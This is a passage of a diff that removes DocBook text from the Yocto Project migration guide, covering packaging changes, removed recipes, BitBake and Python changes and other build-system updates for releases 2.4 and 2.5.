-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>binutils</filename>:</emphasis>
-                    The <filename>libbfd</filename> library is now packaged in
-                    a separate "libbfd" package.
-                    This packaging saves space when certain tools
-                    (e.g. <filename>perf</filename>) are installed.
-                    In such cases, the tools only need
-                    <filename>libbfd</filename> rather than all the packages in
-                    <filename>binutils</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>util-linux</filename> Changes:</emphasis>
-                    <itemizedlist>
-                        <listitem><para>
-                            The <filename>su</filename> program is now packaged
-                            in a separate "util-linux-su" package, which is only
-                            built when "pam" is listed in the
-                            <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
-                            variable.
-                            <filename>util-linux</filename> should not be
-                            installed unless it is needed because
-                            <filename>su</filename> is normally provided through
-                            the shadow file format.
-                            The main <filename>util-linux</filename> package has
-                            runtime dependencies (i.e.
-                            <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
-                            on the <filename>util-linux-su</filename> package
-                            when "pam" is in
-                            <filename>DISTRO_FEATURES</filename>.
-                            </para></listitem>
-                        <listitem><para>
-                            The <filename>switch_root</filename> program is now
-                            packaged in a separate "util-linux-switch-root"
-                            package for small initramfs images that do not need
-                            the whole <filename>util-linux</filename> package or
-                            the busybox binary, which are both much larger than
-                            <filename>switch_root</filename>.
-                            The main <filename>util-linux</filename> package has
-                            a recommended runtime dependency (i.e.
-                            <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>)
-                            on the <filename>util-linux-switch-root</filename> package.
-                            </para></listitem>
-                        <listitem><para>
-                            The <filename>ionice</filename> program is now
-                            packaged in a separate "util-linux-ionice" package.
-                            The main <filename>util-linux</filename> package has
-                            a recommended runtime dependency (i.e.
-                            <filename>RRECOMMENDS</filename>)
-                            on the <filename>util-linux-ionice</filename> package.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>initscripts</filename>:</emphasis>
-                    The <filename>sushell</filename> program is now packaged in
-                    a separate "initscripts-sushell" package.
-                    This packaging change allows systems to pull
-                    <filename>sushell</filename> in when
-                    <filename>selinux</filename> is enabled.
-                    The change also eliminates needing to pull in the entire
-                    <filename>initscripts</filename> package.
-                    The main <filename>initscripts</filename> package has a
-                    runtime dependency (i.e. <filename>RDEPENDS</filename>)
-                    on the <filename>sushell</filename> package when
-                    "selinux" is in <filename>DISTRO_FEATURES</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>glib-2.0</filename>:</emphasis>
-                    The <filename>glib-2.0</filename> package now has a
-                    recommended runtime dependency (i.e.
-                    <filename>RRECOMMENDS</filename>) on the
-                    <filename>shared-mime-info</filename> package, since large
-                    portions of GIO are not useful without the MIME database.
-                    You can remove the dependency by using the
-                    <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
-                    variable if <filename>shared-mime-info</filename> is too
-                    large and is not required.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Go Standard Runtime:</emphasis>
-                    The Go standard runtime has been split out from the main
-                    <filename>go</filename> recipe into a separate
-                    <filename>go-runtime</filename> recipe.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.4-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>acpitests</filename>:</emphasis>
-                    This recipe is not maintained.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>autogen-native</filename>:</emphasis>
-                    No longer required by Grub, oe-core, or meta-oe.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>bdwgc</filename>:</emphasis>
-                    Nothing in OpenEmbedded-Core requires this recipe.
-                    It has moved to meta-oe.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>byacc</filename>:</emphasis>
-                    This recipe was only needed by rpm 5.x and has moved to
-                    meta-oe.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>gcc (5.4)</filename>:</emphasis>
-                    The 5.4 series dropped the recipe in favor of 6.3 / 7.2.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>gnome-common</filename>:</emphasis>
-                    Deprecated upstream and no longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>go-bootstrap-native</filename>:</emphasis>
-                    Go 1.9 does its own bootstrapping so this recipe has been
-                    removed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>guile</filename>:</emphasis>
-                    This recipe was only needed by
-                    <filename>autogen-native</filename> and
-                    <filename>remake</filename>.
-                    The recipe is no longer needed by either of these programs.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libclass-isa-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libdumpvalue-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libenv-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libfile-checktree-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libi18n-collate-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libiconv</filename>:</emphasis>
-                    This recipe was only needed for <filename>uclibc</filename>,
-                    which was removed in the previous release.
-                    <filename>glibc</filename> and <filename>musl</filename>
-                    have their own implementations.
-                    <filename>meta-mingw</filename> still needs
-                    <filename>libiconv</filename>, so it has
-                    been moved to <filename>meta-mingw</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libpng12</filename>:</emphasis>
-                    This recipe was previously needed for LSB. The current
-                    <filename>libpng</filename> is 1.6.x.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libpod-plainer-perl</filename>:</emphasis>
-                    This recipe was previously needed for LSB 4, no longer
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto (4.1)</filename>:</emphasis>
-                    This recipe was removed in favor of 4.4, 4.9, 4.10 and 4.12.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>mailx</filename>:</emphasis>
-                    This recipe was previously only needed for LSB
-                    compatibility, and upstream is defunct.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>mesa (git version only)</filename>:</emphasis>
-                    The git version recipe was stale with respect to the release
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>ofono (git version only)</filename>:</emphasis>
-                    The git version recipe was stale with respect to the release
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>portmap</filename>:</emphasis>
-                    This recipe is obsolete and is superseded by
-                    <filename>rpcbind</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python3-pygpgme</filename>:</emphasis>
-                    This recipe is old and unmaintained. It was previously
-                    required by <filename>dnf</filename>, which has switched
-                    to official <filename>gpgme</filename> Python bindings.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-async</filename>:</emphasis>
-                    This recipe has been removed in favor of the Python 3
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-gitdb</filename>:</emphasis>
-                    This recipe has been removed in favor of the Python 3
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-git</filename>:</emphasis>
-                    This recipe was removed in favor of the Python 3
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-mako</filename>:</emphasis>
-                    This recipe was removed in favor of the Python 3
-                    version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-pexpect</filename>:</emphasis>
-                    This recipe was removed in favor of the Python 3 version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-ptyprocess</filename>:</emphasis>
-                    This recipe was removed in favor of Python the 3 version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-pycurl</filename>:</emphasis>
-                    Nothing is using this recipe in OpenEmbedded-Core
-                    (i.e. <filename>meta-oe</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-six</filename>:</emphasis>
-                    This recipe was removed in favor of the Python 3 version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python-smmap</filename>:</emphasis>
-                    This recipe was removed in favor of the Python 3 version.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>remake</filename>:</emphasis>
-                    Using <filename>remake</filename> as the provider of
-                    <filename>virtual/make</filename> is broken.
-                    Consequently, this recipe is not needed in OpenEmbedded-Core.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.4-kernel-device-tree-move'>
-        <title>Kernel Device Tree Move</title>
-
-        <para>
-            Kernel Device Tree support is now easier to enable in a kernel
-            recipe.
-            The Device Tree code has moved to a
-            <link linkend='ref-classes-kernel-devicetree'><filename>kernel-devicetree</filename></link>
-            class.
-            Functionality is automatically enabled for any recipe that inherits
-            the
-            <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
-            class and sets the
-            <link linkend='var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></link>
-            variable.
-            The previous mechanism for doing this,
-            <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>,
-            is still available to avoid breakage, but triggers a
-            deprecation warning.
-            Future releases of the Yocto Project will remove
-            <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>.
-            It is advisable to remove any <filename>require</filename>
-            statements that request
-            <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>
-            from any custom kernel recipes you might have.
-            This will avoid breakage in post 2.4 releases.
-        </para>
-    </section>
-
-    <section id='migration-2.4-package-qa-changes'>
-        <title>Package QA Changes</title>
-
-        <para>
-            The following package QA changes took place:
-            <itemizedlist>
-                <listitem><para>
-                    The "unsafe-references-in-scripts" QA check has been
-                    removed.
-                    </para></listitem>
-                <listitem><para>
-                    If you refer to <filename>${COREBASE}/LICENSE</filename>
-                    within
-                    <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
-                    you receive a warning because this file is a description of
-                    the license for OE-Core.
-                    Use <filename>${COMMON_LICENSE_DIR}/MIT</filename>
-                    if your recipe is MIT-licensed and you cannot use the
-                    preferred method of referring to a file within the source
-                    tree.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.4-readme-changes'>
-        <title><filename>README</filename> File Changes</title>
-
-        <para>
-            The following are changes to <filename>README</filename> files:
-            <itemizedlist>
-                <listitem><para>
-                    The main Poky <filename>README</filename> file has been
-                    moved to the <filename>meta-poky</filename> layer and
-                    has been renamed <filename>README.poky</filename>.
-                    A symlink has been created so that references to the old
-                    location work.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>README.hardware</filename> file has been moved
-                    to <filename>meta-yocto-bsp</filename>.
-                    A symlink has been created so that references to the old
-                    location work.
-                    </para></listitem>
-                <listitem><para>
-                    A <filename>README.qemu</filename> file has been created
-                    with coverage of the <filename>qemu*</filename> machines.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.4-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following are additional changes:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>ROOTFS_PKGMANAGE_BOOTSTRAP</filename>
-                    variable and any references to it have been removed.
-                    You should remove this variable from any custom recipes.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>meta-yocto</filename> directory has been
-                    removed.
-                    <note>
-                        In the Yocto Project 2.1 release
-                        <filename>meta-yocto</filename> was renamed to
-                        <filename>meta-poky</filename> and the
-                        <filename>meta-yocto</filename> subdirectory remained
-                        to avoid breaking existing configurations.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>maintainers.inc</filename> file, which tracks
-                    maintainers by listing a primary person responsible for each
-                    recipe in OE-Core, has been moved from
-                    <filename>meta-poky</filename> to OE-Core (i.e. from
-                    <filename>meta-poky/conf/distro/include</filename> to
-                    <filename>meta/conf/distro/include</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class now makes a single commit per build rather than one
-                    commit per subdirectory in the repository.
-                    This behavior assumes the commits are enabled with
-                    <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
-                    = "1", which is typical.
-                    Previously, the <filename>buildhistory</filename> class made
-                    one commit per subdirectory in the repository in order to
-                    make it easier to see the changes for a particular
-                    subdirectory.
-                    To view a particular change, specify that subdirectory as
-                    the last parameter on the <filename>git show</filename>
-                    or <filename>git diff</filename> commands.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>x86-base.inc</filename> file, which is
-                    included by all x86-based machine configurations, now sets
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    using <filename>?=</filename> to "live" rather than
-                    appending with <filename>+=</filename>.
-                    This change makes the default easier to override.
-                    </para></listitem>
-                <listitem><para>
-                    BitBake fires multiple "BuildStarted" events when
-                    multiconfig is enabled (one per configuration).
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#events'>Events</ulink>"
-                    section in the BitBake User Manual.
-                    </para></listitem>
-                <listitem><para>
-                    By default, the <filename>security_flags.inc</filename> file
-                    sets a
-                    <link linkend='var-GCCPIE'><filename>GCCPIE</filename></link>
-                    variable with an option to enable Position Independent
-                    Executables (PIE) within <filename>gcc</filename>.
-                    Enabling PIE in the GNU C Compiler (GCC), makes Return
-                    Oriented Programming (ROP) attacks much more difficult to
-                    execute.
-                    </para></listitem>
-                <listitem><para>
-                    OE-Core now provides a
-                    <filename>bitbake-layers</filename> plugin that implements
-                    a "create-layer" subcommand.
-                    The implementation of this subcommand has resulted in the
-                    <filename>yocto-layer</filename> script being deprecated and
-                    will likely be removed in the next Yocto Project release.
-                    </para></listitem>
-                <listitem><para>
-                      The <filename>vmdk</filename>, <filename>vdi</filename>,
-                      and <filename>qcow2</filename> image file types are now
-                      used in conjunction with the "wic" image type through
-                      <filename>CONVERSION_CMD</filename>.
-                      Consequently, the equivalent image types are now
-                      <filename>wic.vmdk</filename>, <filename>wic.vdi</filename>,
-                      and <filename>wic.qcow2</filename>, respectively.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>do_image_&lt;type&gt;[depends]</filename> has
-                    replaced <filename>IMAGE_DEPENDS_&lt;type&gt;</filename>.
-                    If you have your own classes that implement custom image
-                    types, then you need to update them.
-                    </para></listitem>
-                <listitem><para>
-                    OpenSSL 1.1 has been introduced.
-                    However, the default is still 1.0.x through the
-                    <link linkend='var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
-                    variable.
-                    This preference is set is due to the remaining compatibility
-                    issues with other software.
-                    The
-                    <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
-                    variable  in the openssl 1.0 recipe now includes "openssl10"
-                    as a marker that can be used in
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                    within recipes that build software that still depend on
-                    OpenSSL 1.0.
-                    </para></listitem>
-                <listitem><para>
-                    To ensure consistent behavior, BitBake's "-r" and "-R"
-                    options (i.e. prefile and postfile), which are used to
-                    read or post-read additional configuration files from the
-                    command line, now only affect the current BitBake command.
-                    Before these BitBake changes, these options would "stick"
-                    for future executions.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.5-release'>
-    <title>Moving to the Yocto Project 2.5 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.5 Release from the prior release.
-    </para>
-
-    <section id='migration-2.5-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            This section provides information about packaging changes that have
-            occurred:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>bind-libs</filename>:</emphasis>
-                    The libraries packaged by the bind recipe are in a
-                    separate <filename>bind-libs</filename> package.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libfm-gtk</filename>:</emphasis>
-                    The <filename>libfm</filename> GTK+ bindings are split into
-                    a separate <filename>libfm-gtk</filename> package.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>flex-libfl</filename>:</emphasis>
-                    The flex recipe splits out libfl into a separate
-                    <filename>flex-libfl</filename> package to avoid too many
-                    dependencies being pulled in where only the library is
-                    needed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>grub-efi</filename>:</emphasis>
-                    The <filename>grub-efi</filename> configuration is split
-                    into a separate <filename>grub-bootconf</filename>
-                    recipe.
-                    However, the dependency relationship from
-                    <filename>grub-efi</filename> is through a
-                    virtual/grub-bootconf provider making it possible to have
-                    your own recipe provide the dependency.
-                    Alternatively, you can use a BitBake append file to bring
-                    the configuration back into the
-                    <filename>grub-efi</filename> recipe.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>armv7a Legacy Package Feed Support:</emphasis>
-                    Legacy support is removed for transitioning from
-                    <filename>armv7a</filename> to
-                    <filename>armv7a-vfp-neon</filename> in package feeds,
-                    which was previously enabled by setting
-                    <filename>PKGARCHCOMPAT_ARMV7A</filename>.
-                    This transition occurred in 2011 and active package feeds
-                    should by now be updated to the new naming.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.5-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>gcc</filename>:</emphasis>
-                    The version 6.4 recipes are replaced by 7.x.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>gst-player</filename>:</emphasis>
-                    Renamed to <filename>gst-examples</filename> as per
-                    upstream.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>hostap-utils</filename>:</emphasis>
-                    This software package is obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>latencytop</filename>:</emphasis>
-                    This recipe is no longer maintained upstream.
-                    The last release was in 2009.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>libpfm4</filename>:</emphasis>
-                    The only file that requires this recipe is
-                    <filename>oprofile</filename>, which has been removed.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>linux-yocto</filename>:</emphasis>
-                    The version 4.4, 4.9, and 4.10 recipes have been removed.
-                    Versions 4.12, 4.14, and 4.15 remain.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>man</filename>:</emphasis>
-                    This recipe has been replaced by modern
-                    <filename>man-db</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>mkelfimage</filename>:</emphasis>
-                    This tool has been removed in the upstream coreboot project,
-                    and is no longer needed with the removal of the ELF image
-                    type.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>nativesdk-postinst-intercept</filename>:</emphasis>
-                    This recipe is not maintained.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>neon</filename>:</emphasis>
-                    This software package is no longer maintained upstream and
-                    is no longer needed by anything in OpenEmbedded-Core.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>oprofile</filename>:</emphasis>
-                    The functionality of this recipe is replaced by
-                    <filename>perf</filename> and keeping compatibility on
-                    an ongoing basis with <filename>musl</filename> is
-                    difficult.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>pax</filename>:</emphasis>
-                    This software package is obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>stat</filename>:</emphasis>
-                    This software package is not maintained upstream.
-                    <filename>coreutils</filename> provides a modern stat binary.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>zisofs-tools-native</filename>:</emphasis>
-                    This recipe is no longer needed because the compressed
-                    ISO image feature has been removed.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.5-scripts-and-tools-changes'>
-        <title>Scripts and Tools Changes</title>
-
-        <para>
-            The following are changes to scripts and tools:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>yocto-bsp</filename>,
-                    <filename>yocto-kernel</filename>, and
-                    <filename>yocto-layer</filename></emphasis>:
-                    The <filename>yocto-bsp</filename>,
-                    <filename>yocto-kernel</filename>, and
-                    <filename>yocto-layer</filename> scripts previously shipped
-                    with poky but not in OpenEmbedded-Core have been removed.
-                    These scripts are not maintained and are outdated.
-                    In many cases, they are also limited in scope.
-                    The <filename>bitbake-layers create-layer</filename> command
-                    is a direct replacement for <filename>yocto-layer</filename>.
-                    See the documentation to create a BSP or kernel recipe in
-                    the
-                    "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-kernel-recipe-example'>BSP Kernel Recipe Example</ulink>"
-                     section.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>devtool finish</filename>:</emphasis>
-                    <filename>devtool finish</filename> now exits with an error
-                    if there are uncommitted changes or a rebase/am in progress
-                    in the recipe's source repository.
-                    If this error occurs, there might be uncommitted changes
-                    that will not be included in updates to the patches applied
-                    by the recipe.
-                    A -f/--force option is provided for situations that the
-                    uncommitted changes are inconsequential and you want to
-                    proceed regardless.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>scripts/oe-setup-rpmrepo</filename> script:</emphasis>
-                    The functionality of
-                    <filename>scripts/oe-setup-rpmrepo</filename> is replaced by
-                    <filename>bitbake package-index</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>scripts/test-dependencies.sh</filename> script:</emphasis>
-                    The script is largely made obsolete by the
-                    recipe-specific sysroots functionality introduced in the
-                    previous release.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.5-bitbake-changes'>
-        <title>BitBake Changes</title>
-
-        <para>
-            The following are BitBake changes:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>--runall</filename> option has changed.
-                    There are two different behaviors people might want:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis>Behavior A:</emphasis>
-                            For a given target (or set of targets) look through
-                            the task graph and run task X only if it is present
-                            and will be built.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Behavior B:</emphasis>
-                            For a given target (or set of targets) look through
-                            the task graph and run task X if any recipe in the
-                            taskgraph has such a target, even if it is not in
-                            the original task graph.
-                            </para></listitem>
-                    </itemizedlist>
-                    The <filename>--runall</filename> option now performs
-                    "Behavior B".
-                    Previously <filename>--runall</filename> behaved like
-                    "Behavior A".
-                    A <filename>--runonly</filename> option has been added to
-                    retain the ability to perform "Behavior A".
-                    </para></listitem>
-                <listitem><para>
-                    Several explicit "run this task for all recipes in the
-                    dependency tree" tasks have been removed (e.g.
-                    <filename>fetchall</filename>,
-                    <filename>checkuriall</filename>, and the
-                    <filename>*all</filename> tasks provided by the
-                    <filename>distrodata</filename> and
-                    <filename>archiver</filename> classes).
-                    There is a BitBake option to complete this for any arbitrary
-                    task. For example:
-                    <literallayout class='monospaced'>
-     bitbake &lt;target&gt; -c fetchall
-                    </literallayout>
-                    should now be replaced with:
-                    <literallayout class='monospaced'>
-     bitbake &lt;target&gt; --runall=fetch
-                    </literallayout>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.5-python-and-python3-changes'>
-        <title>Python and Python 3 Changes</title>
-
-        <para>
-            The following are auto-packaging changes to Python and Python 3:
-        </para>
-        <para>
-            The script-managed <filename>python-*-manifest.inc</filename> files
-            that were previously used to generate Python and Python 3
-            packages have been replaced with a JSON-based file that is
-            easier to read and maintain.
-            A new task is available for maintainers of the Python recipes to
-            update the JSON file when upgrading to new Python versions.
-            You can now edit the file directly instead of having to edit a
-            script and run it to update the file.
-        </para>
-        <para>
-            One particular change to note is that the Python recipes no longer
-            have build-time provides for their packages.
-            This assumes <filename>python-foo</filename> is one of the packages
-            provided by the Python recipe.
-            You can no longer run <filename>bitbake python-foo</filename> or
-            have a <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink> on
-            <filename>python-foo</filename>, but doing either of the following
-            causes the package to work as expected:
-            <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " python-foo"
-            </literallayout>
-            or
-            <literallayout class='monospaced'>
-     RDEPENDS_${PN} = "python-foo"
-            </literallayout>
-            The earlier build-time provides behavior was a quirk of the way the
-            Python manifest file was created.
-            For more information on this change please see
-            <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=8d94b9db221d1def42f091b991903faa2d1651ce'>this commit</ulink>.
-        </para>
-    </section>
-
-    <section id='migration-2.5-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following are additional changes:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>kernel</filename> class supports building
-                    packages for multiple kernels.
-                    If your kernel recipe or <filename>.bbappend</filename> file
-                    mentions packaging at all, you should replace references to
-                    the kernel in package names with
-                    <filename>${KERNEL_PACKAGE_NAME}</filename>.
-                    For example, if you disable automatic installation of the
-                    kernel image using
-                    <filename>RDEPENDS_kernel-base = ""</filename> you can avoid
-                    warnings using
-                    <filename>RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""</filename>
-                    instead.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>buildhistory</filename> class commits changes
-                    to the repository by default so you no longer need to set
-                    <filename>BUILDHISTORY_COMMIT = "1"</filename>.
-                    If you want to disable commits you need to set
-                    <filename>BUILDHISTORY_COMMIT = "0"</filename> in your
-                    configuration.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>beaglebone</filename> reference machine has
-                    been renamed to <filename>beaglebone-yocto</filename>.
-                    The <filename>beaglebone-yocto</filename> BSP is a reference
-                    implementation using only mainline components available in
-                    OpenEmbedded-Core and <filename>meta-yocto-bsp</filename>,
-                    whereas Texas Instruments maintains a full-featured BSP in
-                    the <filename>meta-ti</filename> layer.
-                    This rename avoids the previous name clash that existed
-                    between the two BSPs.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>update-alternatives</filename> class no longer
-                    works with SysV <filename>init</filename> scripts because
-                    this usage has been problematic.
-                    Also, the <filename>sysklogd</filename> recipe no longer
-                    uses <filename>update-alternatives</filename> because it is
-                    incompatible with other implementations.
-                    </para></listitem>
-                <listitem><para>
-                    By default, the
-                    <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
-                    class uses <filename>ninja</filename> instead of
-                    <filename>make</filename> for building.
-                    This improves build performance.
-                    If a recipe is broken with <filename>ninja</filename>, then
-                    the recipe can set
-                    <filename>OECMAKE_GENERATOR = "Unix Makefiles"</filename>
-                    to change back to <filename>make</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    The previously deprecated <filename>base_*</filename>
-                    functions have been removed in favor of their replacements
-                    in <filename>meta/lib/oe</filename> and
-                    <filename>bitbake/lib/bb</filename>.
-                    These are typically used from recipes and classes.
-                    Any references to the old functions must be updated.
-                    The following table shows the removed functions and their
-                    replacements:
-
-                    <literallayout class='monospaced'>
-     <emphasis>Removed</emphasis>                                 <emphasis>Replacement</emphasis>
-     ============================            ============================
-     base_path_join()                        oe.path.join()
-     base_path_relative()                    oe.path.relative()
-     base_path_out()                         oe.path.format_display()
-     base_read_file()                        oe.utils.read_file()
-     base_ifelse()                           oe.utils.ifelse()
-     base_conditional()                      oe.utils.conditional()
-     base_less_or_equal()                    oe.utils.less_or_equal()
-     base_version_less_or_equal()            oe.utils.version_less_or_equal()
-     base_contains()                         bb.utils.contains()
-     base_both_contain()                     oe.utils.both_contain()
-     base_prune_suffix()                     oe.utils.prune_suffix()
-     oe_filter()                             oe.utils.str_filter()
-     oe_filter_out()                         oe.utils.str_filter_out() (or use the _remove operator).
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    Using <filename>exit 1</filename> to explicitly defer a
-                    postinstall script until first boot is now deprecated since
-                    it is not an obvious mechanism and can mask actual errors.
-                    If you want to explicitly defer a postinstall to first boot
-                    on the target rather than at <filename>rootfs</filename>
-                    creation time, use
-                    <filename>pkg_postinst_ontarget()</filename>
-                    or call
-                    <filename>postinst_intercept delay_to_first_boot</filename>
-                    from <filename>pkg_postinst()</filename>.
-                    Any failure of a <filename>pkg_postinst()</filename>
-                    script (including <filename>exit 1</filename>)
-                    will trigger a warning during
-                    <filename>do_rootfs</filename>.</para>
-
-                    <para>For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>elf</filename> image type has been removed.
-                    This image type was removed because the
-                    <filename>mkelfimage</filename> tool
-                    that was required to create it is no longer provided by
-                    coreboot upstream and required updating every time
-                    <filename>binutils</filename> updated.
-                    </para></listitem>
-                <listitem><para>
-                    Support for .iso image compression (previously enabled
-                    through <filename>COMPRESSISO = "1"</filename>) has been
-                    removed.
-                    The userspace tools (<filename>zisofs-tools</filename>) are
-                    unmaintained and <filename>squashfs</filename> provides
-                    better performance and compression.
-                    In order to build a live image with squashfs+lz4 compression
-                    enabled you should now set
